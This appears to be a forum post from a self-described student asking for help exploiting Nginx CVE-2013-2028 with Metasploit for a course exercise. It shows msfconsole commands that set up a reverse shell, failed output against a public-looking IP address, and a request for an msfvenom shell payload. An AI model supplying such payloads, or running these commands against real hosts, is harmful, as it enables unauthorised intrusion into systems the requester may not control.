Hello world!
I am currently studying for a systems engineering degree, and one of the courses is named "Data security". In one fictitious case, the professor ordered us to exploit a host (really a VMware virtual machine) of an "aeronautical company (in this case it could be Boeing or Lockheed)" and later present him some recommendations in order to avoid future intrusions. This is part of an exam or academic activity. Well, I did a vulnerability scan with an NSE script and the scanner returned the following vulns: [CVE-2013-2028] The ngx_http_parse_chunked_function (in the CVE database), and it returned the exploitdb entry as well: [25775] Nginx 1.3.9 < 1.4.0 - Chunked Encoding Stack Buffer Overflow (Metasploit). I downloaded the script and followed the next steps:
msf6 exploit(linux/remote/25775) > set ReverseListenerBindAddress 192.168.1.13 #I set my private ip
ReverseListenerBindAddress => 192.168.1.13
msf6 exploit(linux/remote/25775) > set LHOST 190.*******121 #I supposed due the host is remote, I should set my ip public.
LHOST => 190.205.6.111
msf6 exploit(linux/remote/25775) > set ReverseListenerBindPort 4444
ReverseListenerBindPort => 4444
msf6 exploit(linux/remote/25775) > set LPORT 4444
LPORT => 4444
msf6 exploit(linux/remote/25775) > run
But this is what msfconsole returned to me:
[*] Started reverse TCP handler on 192.168.1.13:4444
[*] 200.2.15.150:80 - 200.******:80 - Searching for stack canary
[*] 200.2.15.150:80 - 200.******175:80 - Assuming byte 0 0x00
[*] 200.2.15.150:80 - 200******175:80 - Bruteforcing byte 1
[*] 200.2.15.150:80 - 200******175:80 - Bruteforcing byte 2
[-] 200.2.15.150:80 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (200.*****175:80) timed out.
[*] Exploit completed, but no session was created
Now, I'd like to make clear some of my considerations.
First: At the beginning, I thought that a firewall could be blocking the connection on port 4444. So I used the command sudo ufw allow 4444 and it returned the message: Rule Added (v6). But it is still not working.
Second: I believe the main error is the payload. I saw in other examples that I must create a payload with msfvenom that adapts better to the default exploit. But the problem is that I tried without any satisfactory result. Could you please tell me how to create a payload that opens a shell on the virtual machine? The host runs Linux kernel 4.4.x (probably Ubuntu 16.04).
Third: If you know the nginx server, could you please tell me what the best way to exploit one is?
PS: This is in no way an illegal activity; it is just an evaluated activity that the course professor ordered us to do.
Thanks, and I'd appreciate the help!